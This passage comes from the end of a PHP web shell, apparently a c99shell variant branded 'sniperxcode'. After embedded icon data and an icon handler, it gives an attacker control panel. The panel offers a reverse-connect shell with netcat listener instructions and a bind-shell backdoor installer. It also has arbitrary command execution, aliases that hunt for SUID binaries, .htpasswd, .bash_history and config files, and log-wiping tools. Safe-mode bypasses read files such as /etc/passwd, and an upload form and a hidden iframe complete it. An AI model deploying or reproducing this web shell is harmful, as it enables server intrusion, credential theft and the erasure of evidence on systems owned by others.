3637. "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
3638. "FxEAOw＝＝",
3639. "ext_js"＝＞
3640. "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
3641. "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
3642. "a00AjYYBbc/o9HjNniUAADs＝",
3643. "ext_lnk"＝＞
3644. "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
3645. "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
3646. "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
3647. "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
3648. "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
3649. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3650. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3651. "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
3652. "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
3653. "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
3654. "ADs＝",
3655. "ext_log"＝＞
3656. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
3657. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
3658. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw＝＝",
3659. "ext_php"＝＞
3660. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
3661. "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw＝＝",
3662. "ext_pl"＝＞
3663. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
3664. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
3665. "ext_swf"＝＞
3666. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
3667. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3668. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
3669. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
3670. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs＝",
3671. "ext_tar"＝＞
3672. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
3673. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
3674. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
3675. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
3676. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3677. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3678. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3679. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
3680. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
3681. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
3682. "u4tLAgEAOw＝＝",
3683. "ext_txt"＝＞
3684. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
3685. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
3686. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
3687. "ext_wri"＝＞
3688. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
3689. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
3690. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs＝",
3691. "ext_xml"＝＞
3692. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
3693. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3694. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
3695. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
3696. "IQA7"
3697. ）;
3698. //For simple size- and speed-optimization.
3699. $imgequals ＝ array（
3700. "ext_tar"＝＞array（"ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"）,
3701. "ext_php"＝＞array（"ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"）,
3702. "ext_jpg"＝＞array（"ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"）,
3703. "ext_html"＝＞array（"ext_html","ext_htm"）,
3704. "ext_avi"＝＞array（"ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"）,
3705. "ext_lnk"＝＞array（"ext_lnk","ext_url"）,
3706. "ext_ini"＝＞array（"ext_ini","ext_css","ext_inf"）,
3707. "ext_doc"＝＞array（"ext_doc","ext_dot"）,
3708. "ext_js"＝＞array（"ext_js","ext_vbs"）,
3709. "ext_cmd"＝＞array（"ext_cmd","ext_bat","ext_pif"）,
3710. "ext_wri"＝＞array（"ext_wri","ext_rtf"）,
3711. "ext_swf"＝＞array（"ext_swf","ext_fla"）,
3712. "ext_mp3"＝＞array（"ext_mp3","ext_au","ext_midi","ext_mid"）,
3713. "ext_htaccess"＝＞array（"ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so"）
3714. ）;
3715. if （!$getall）
3716. {
3717. header（"Content-type: image/gif"）;
3718. header（"Cache-control: public"）;
3719. header（"Expires: ".date（"r",mktime（0,0,0,1,1,2030）））;
3720. header（"Cache-control: max-age＝".（60*60*24*7））;
3721. header（"Last-Modified: ".date（"r",filemtime（__FILE__）））;
3722. foreach（$imgequals as $k＝＞$v） {if （in_array（$img,$v）） {$img ＝ $k; break;}}
3723. if （empty（$images[$img]）） {$img ＝ "small_unk";}
3724. if （in_array（$img,$ext_tar）） {$img ＝ "ext_tar";}
3725. echo base64_decode（$images[$img]）;
3726. }
3727. else
3728. {
3729. foreach（$imgequals as $a＝＞$b） {foreach （$b as $d） {if （$a !＝ $d） {if （!empty（$images[$d]）） {echo（"Warning! Remove \$images[".$d."]＜br＞"）;}}}}
3730. natsort（$images）;
3731. $k ＝ array_keys（$images）;
3732. echo "＜center＞";
3733. foreach （$k as $u） {echo $u.":＜img src＝\"".$surl."act＝img&img＝".$u."\" border＝\"1\"＞＜br＞";}
3734. echo "＜/center＞";
3735. }
3736. exit;
3737. }
3738. if （$act ＝＝ "about"） {echo "＜center＞＜b＞Credits:＜br＞Idea, leading and coding by tristram[CCTeaM].＜br＞Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].＜br＞Thanks all who report bugs.＜br＞All bugs send to tristram's ICQ #656555 ＜a href＝\"http://wwp.icq.com/scripts/contact.dll?msgto＝656555\"＞＜img src＝\"http://wwp.icq.com/scripts/online.dll?icq＝656555&img＝5\" border＝0 align＝absmiddle＞＜/a＞.＜/b＞";}
3739. if （$act ＝＝ "backc"）
3740. {
3741. $ip ＝ $_SERVER["REMOTE_ADDR"];
3742. $msg ＝ $_POST['backcconnmsg'];
3743. $emsg ＝ $_POST['backcconnmsge'];
3744. echo（'＜center＞＜b＞Back-Connection:＜/b＞＜/br＞＜/br＞＜form name＝form method＝POST＞Host:＜input type＝text name＝backconnectip size＝15 value＝'.$ip.'＞ Port: ＜input type＝text name＝backconnectport size＝15 value＝5992＞ Use: ＜select size＝1 name＝use＞＜option value＝Perl＞Perl＜/option＞＜option value＝C＞C＜/option＞＜/select＞ ＜input type＝submit name＝submit value＝Connect＞＜/form＞First, run NetCat on your computer using \'＜b＞nc -l -n -v -p '.$bc_port.'＜/b＞\'. Then, click "Connect" once the port is listening.＜/center＞'）;
3745. echo $msg;
3746. echo $emsg;
3747. }
3748.  
3749. if （$act ＝＝ 'shbd'）{
3750. $msg ＝ $_POST['backcconnmsg'];
3751. $emsg ＝ $_POST['backcconnmsge'];
3752. echo（"＜center＞＜b＞Bind Shell Backdoor:＜/b＞＜/br＞＜/br＞＜form name＝form method＝POST＞
3753. Bind Port: ＜input type＝'text' name＝'backconnectport' value＝'5992'＞
3754. ＜input type＝'hidden' name＝'use' value＝'shbd'＞
3755. ＜input type＝'submit' value＝'Install Backdoor'＞＜/form＞"）;
3756. echo（"$msg"）;
3757. echo（"$emsg"）;
3758. echo（"＜/center＞"）;
3759. } ?＞
3760. ＜/td＞＜/tr＞＜/table＞＜a bookmark＝"minipanel"＞＜br＞＜TABLE style＝"BORDER-COLLAPSE: collapse" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 height＝"1" width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞
3761. ＜tr＞＜td width＝"100%" height＝"1" valign＝"top" colspan＝"2"＞＜/td＞＜/tr＞
3762. ＜tr＞＜td width＝"50%" height＝"1" valign＝"top"＞＜center＞＜b＞Enter: ＜/b＞＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝hidden name＝act value＝"cmd"＞＜input type＝hidden name＝"d" value＝"＜?php echo $dispd; ?＞"＞＜input type＝"text" name＝"cmd" size＝"50" value＝"＜?php echo htmlspecialchars（$cmd）; ?＞"＞＜input type＝hidden name＝"cmd_txt" value＝"1"＞ ＜input type＝submit name＝submit value＝"Execute"＞＜/form＞＜/td＞
3763. ＜td width＝"50%" height＝"1" valign＝"top"＞
3764. ＜center＞Kernel Info: ＜form method＝"get" action＝"http://google.com/search"＞
3765. ＜input name＝"q" type＝"text" size＝"80" value＝"＜?php echo wordwrap（php_uname（））; ?＞"＞
3766. ＜input type＝submit value＝"Google!"＞
3767. ＜/form＞＜/center＞
3768. ＜/td＞＜/tr＞
3769. ＜/TABLE＞
3770. ＜br＞
3771. ＜TABLE style＝"BORDER-COLLAPSE: collapse" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 height＝"116" width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞
3772. ＜tr＞＜td height＝"1" valign＝"top"＞＜/td＞＜/tr＞
3773. ＜tr＞＜td width＝"100%" height＝"83" valign＝"top"＞
3774.  
3775. ＜center＞
3776. ＜table border＝0＞
3777. ＜tr＞＜td＞
3778. ＜center＞Functions＜/center＞
3779. ＜/td＞＜td＞
3780. ＜center＞Make Dir＜/center＞
3781. ＜/td＞＜td＞
3782. ＜center＞Go Dir＜/center＞
3783. ＜/td＞＜/tr＞
3784. ＜tr＞＜td＞
3785. ＜center＞
3786. ＜form action＝"＜?php echo $surl; ?＞"＞
3787. ＜input type＝hidden name＝"d" value＝"＜?php echo $dispd; ?＞"＞
3788. ＜SELECT NAME＝"act"＞
3789. ＜OPTION VALUE＝"zap2"＞Wipe Logs Using zap2 （*nix）
3790. ＜OPTION VALUE＝"miglc"＞Wipe Logs Using Mig-LogCleaner （*nix）
3791. ＜OPTION VALUE＝"clearlogs"＞Wipe Logs Using ClearLogs （Windows）
3792. ＜/SELECT＞＜br＞
3793. ＜input type＝submit name＝"submit" value＝"Execute"＞＜br＞
3794.  
3795. ＜/form＞
3796. ＜/center＞
3797. ＜/td＞＜td＞
3798. ＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝hidden name＝act value＝"mkdir"＞＜input type＝hidden name＝"d" value＝"＜?php echo $dispd; ?＞"＞
3799. ＜center＞
3800. ＜input type＝"text" name＝"mkdir" size＝"50" value＝"＜?php echo $dispd; ?＞"＞
3801. ＜br＞
3802. ＜input type＝submit value＝"Create"＞＜br＞＜?php echo $wdt; ?＞＜/form＞
3803. ＜/center＞
3804. ＜/td＞＜td＞
3805. ＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝hidden name＝act value＝"ls"＞
3806. ＜center＞
3807. ＜input type＝"text" name＝"d" size＝"50" value＝"＜?php echo $dispd; ?＞"＞
3808. ＜br＞
3809. ＜input type＝submit value＝"Go"＞＜br＞
3810.  
3811. ＜/form＞
3812. ＜/center＞
3813. ＜/td＞＜/tr＞
3814. ＜tr＞＜td＞
3815. ＜center＞Aliases＜/center＞
3816. ＜/td＞＜td＞
3817. ＜center＞Make File＜/center＞
3818. ＜/td＞＜td＞
3819. ＜center＞Go File＜/center＞
3820. ＜/td＞＜/tr＞
3821. ＜tr＞＜td＞
3822. ＜?php
3823. // Command-aliases
3824. if （!$win） // if the box isn't windows; most likely *nix
3825. {
3826. $cmdaliases ＝ array（
3827. array（'-----------------------------------------------------------', 'ls -la'）,
3828. array（'Currently Logged in Users', 'w'）,
3829. array（'Last User to Connect', 'lastlog'）,
3830. array（'Find Users Without a Password', 'cut -d: -f1,2,3 /etc/passwd | grep ::'）,
3831. array（'Is /etc Writable?', 'find /etc/ -type f -perm -o+w 2＞ /dev/null'）,
3832. array（'Installed Downloaders', 'which wget curl w3m lynx'）,
3833. array（'Open Ports', 'netstat -an | grep -i listen'）,
3834. array（'Box Uptime', 'uptime'）,
3835. array（'System Variables', 'set'）,
3836. array（'ARP table', 'arp -a'）,
3837. array（'Patch Level for RedHat 7.0', 'rpm -qa'）,
3838. array（'Network Interfaces', 'ifconfig'）,
3839. array（'Mounted Filesystems', 'mount'）,
3840. array（'Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2＞ /dev/null'）,
3841. array（"Find All Suid Files", "find / -type f -perm -04000 -ls"）,
3842. array（"Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"）,
3843. array（"Find All Sgid Files", "find / -type f -perm -02000 -ls"）,
3844. array（"Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"）,
3845. array（"Find config.inc.php Files", "find / -type f -name config.inc.php"）,
3846. array（"Find config* Files", "find / -type f -name \"config*\""）,
3847. array（"Find config* Files in Current Dir", "find . -type f -name \"config*\""）,
3848. array（"Find All Writable Folders and Files", "find / -perm -2 -ls"）,
3849. array（"Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"）,
3850. array（"Find All service.pwd Files", "find / -type f -name service.pwd"）,
3851. array（"Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"）,
3852. array（"Find All .htpasswd Files", "find / -type f -name .htpasswd"）,
3853. array（"Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"）,
3854. array（"Find All .bash_history Files", "find / -type f -name .bash_history"）,
3855. array（"Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"）,
3856. array（"Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"）,
3857. array（"Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"）,
3858. array（"List File Attributes on a Linux Second Extended File System", "lsattr -va"）,
3859. ）;
3860. }
3861. else // if the box is windows
3862. {
3863. $cmdaliases ＝ array（
3864. array（'-----------------------------------------------------------', 'dir'）,
3865. array（'Active Connections', 'netstat -an'）,
3866. array（'ARP Table', 'arp -a'）,
3867. array（'Net Shares', 'net use'）,
3868. array（'IP Configuration', 'ipconfig /all'）,
3869. array（'Disk Quotas', 'fsutil quota query '.$pd[0]）,
3870. array（'Drive Type', 'fsutil fsinfo drivetype '.$pd[0]）
3871. ）;
3872. }
3873. ?＞
3874. ＜center＞＜form action＝"＜?php echo $surl; ?＞act＝cmd" method＝"POST"＞＜input type＝hidden name＝act value＝"cmd"＞＜input type＝hidden name＝"d" value＝"＜?php echo $dispd; ?＞"＞＜select name＝"cmd"＞＜?php foreach （$cmdaliases as $als） {echo "＜option value＝\"".htmlspecialchars（$als[1]）."\"＞".htmlspecialchars（$als[0]）."＜/option＞";} ?＞＜/select＞＜input type＝hidden name＝"cmd_txt" value＝"1"＞
3875. ＜br＞
3876. ＜input type＝submit name＝submit value＝"Execute"＞＜br＞
3877.  
3878. ＜/form＞
3879. ＜/center＞
3880. ＜/td＞＜td＞
3881. ＜center＞
3882. ＜form method＝"POST"＞＜input type＝hidden name＝act value＝"mkfile"＞＜input type＝hidden name＝"d" value＝"＜?php echo $dispd; ?＞"＞
3883. ＜input type＝"text" name＝"mkfile" size＝"50" value＝"＜?php echo $dispd; ?＞"＞＜input type＝hidden name＝"ft" value＝"edit"＞
3884. ＜br＞
3885. ＜input type＝submit value＝"Create"＞＜br＞＜?php echo $wdt; ?＞＜/form＞
3886. ＜/center＞
3887. ＜/td＞＜td＞
3888. ＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝hidden name＝act value＝"gofile"＞＜input type＝hidden name＝"d" value＝"＜?php echo $dispd; ?＞"＞
3889. ＜center＞
3890. ＜input type＝"text" name＝"f" size＝"50" value＝"＜?php echo $dispd; ?＞"＞
3891. ＜br＞
3892. ＜input type＝submit value＝"Go"＞＜/form＞
3893. ＜br＞ 
3894. ＜/center＞
3895. ＜/td＞＜/tr＞
3896. ＜/table＞
3897. ＜/center＞
3898. ＜/td＞＜/tr＞
3899. ＜/TABLE＞＜br＞
3900. ＜TABLE style＝"BORDER-COLLAPSE: collapse" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 height＝"116" width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞
3901. ＜tr＞＜td height＝"1" valign＝"top" colspan＝"2"＞＜/td＞＜/tr＞
3902. ＜tr＞＜td width＝50% height＝83 valign＝top＞
3903. ＜center＞PHP Safe-Mode Bypass （Read File）＜br＞＜br＞
3904. ＜form action＝"＜?php echo $surl; ?＞" method＝GET＞
3905. File: ＜input type＝text name＝"file"＞ ＜input type＝submit value＝"Read File"＞
3906. ＜br＞＜br＞
3907. e.g.: /etc/passwd or C:/whatev.txt
3908. ＜/form＞
3909. ＜/center＞
3910. ＜?php
3911. if（isset（$_GET['file']）） {
3912. $test＝'';
3913. $temp＝tempnam（$test, 'cx'）;
3914. $file＝$_GET['file'];
3915. $get＝htmlspecialchars（$file）;
3916. echo 'Trying To Get File ＜font color＝#000099＞＜b＞'.$get.'＜/b＞＜/font＞＜br＞';
3917. if（copy（"compress.zlib://".$file, $temp））{
3918. $fichier ＝ fopen（$temp, 'r'）;
3919. $action ＝ fread（$fichier, filesize（$temp））;
3920. fclose（$fichier）;
3921. $source＝htmlspecialchars（$action）;
3922. echo '＜b＞Start '.$get.'＜/b＞＜br＞＜br＞＜font color＝white＞'.$source.'＜/font＞＜br＞＜b＞＜br＞Fin ＜font color＝#000099＞'.$get.'＜/font＞＜/b＞';
3923. unlink（$temp）;
3924. } else
3925. echo '＜font color＝red＞＜center＞Sorry... File ＜b＞'.htmlspecialchars（$file）.'＜/b＞ dosen\'t exists or you don\'t have access.＜/center＞＜/font＞';
3926. }
3927. ?＞
3928. ＜/td＞＜td width＝50% height＝83 valign＝top＞
3929. ＜center＞PHP Safe-Mode Bypass （Directory Listing）＜br＞＜br＞
3930. ＜form action＝"＜?php echo $surl; ?＞" method＝GET＞
3931. Dir: ＜input type＝text name＝"directory"＞ ＜input type＝submit value＝"List Directory"＞
3932. ＜br＞＜br＞
3933. e.g.: /etc/ or C:/
3934. ＜/form＞
3935. ＜/center＞
3936. ＜?php
3937. if（isset（$_GET['directory']）） {
3938. $chemin ＝ $_GET['directory'];
3939. $files ＝ glob（"$chemin*"）;
3940. echo 'Trying To List Folder ＜font color＝#000099＞＜b＞'.$chemin.'＜/b＞＜/font＞＜br＞＜br＞';
3941. foreach （$files as $filename）
3942. echo $filename."\n＜br＞"; // added the \n for easier readability while viewing the html source
3943. }
3944. ?＞
3945. ＜/td＞
3946. ＜/tr＞＜/TABLE＞
3947. ＜br＞
3948. ＜TABLE style＝"BORDER-COLLAPSE: collapse" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 height＝"1" width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞
3949. ＜tr＞＜td height＝"1" valign＝"top" colspan＝"2"＞＜/td＞＜/tr＞
3950. ＜tr＞
3951. ＜td width＝"50%" height＝"1" valign＝"top"＞＜center＞Search＜form method＝"POST"＞＜input type＝hidden name＝act value＝"search"＞＜input type＝hidden name＝"d" value＝"＜?php echo $dispd; ?＞"＞＜input type＝"text" name＝"search_name" size＝"29" value＝"（.*）"＞ ＜input type＝"checkbox" name＝"search_name_regexp" value＝"1" checked＞ - regexp ＜input type＝submit name＝submit value＝"Search"＞＜/form＞＜/center＞＜/p＞＜/td＞
3952. ＜td width＝"50%" height＝"1" valign＝"top"＞＜center＞Upload＜form method＝"POST" ENCTYPE＝"multipart/form-data"＞＜input type＝hidden name＝act value＝"upload"＞＜input type＝"file" name＝"uploadfile"＞＜input type＝hidden name＝"miniform" value＝"1"＞ ＜input type＝submit name＝submit value＝"Upload"＞＜br＞＜?php echo $wdt; ?＞＜/form＞＜/center＞＜/td＞
3953. ＜/tr＞
3954. ＜/table＞
3955. ＜br＞＜TABLE style＝"BORDER-COLLAPSE: collapse" height＝1 cellSpacing＝0 borderColorDark＝#666666 cellPadding＝0 width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞＜tr＞＜td width＝"990" height＝"1" valign＝"top"＞＜center＞＜b＞--[ sniperxcode v＜?php echo $shver; ?＞, coded by storm＜/font＞＜/a＞＜font color＝"#FF0000"＞＜/font＞ | Generation time: ＜?php echo round（getmicrotime（）-starttime,4）; ?＞ ]--＜/b＞＜br＞Who said that it's better as a hacKer?＜br＞I wish that I had never hacked at all.＜/center＞＜/td＞＜/tr＞＜/table＞
3956. ＜/body＞＜/html＞＜?php chdir（$lastdir）; c99shexit（）; ?＞
3957. ＜IFRAME src＝"http://www.google.com" width＝0 height＝0 frameborder＝0＞＜/IFRAME＞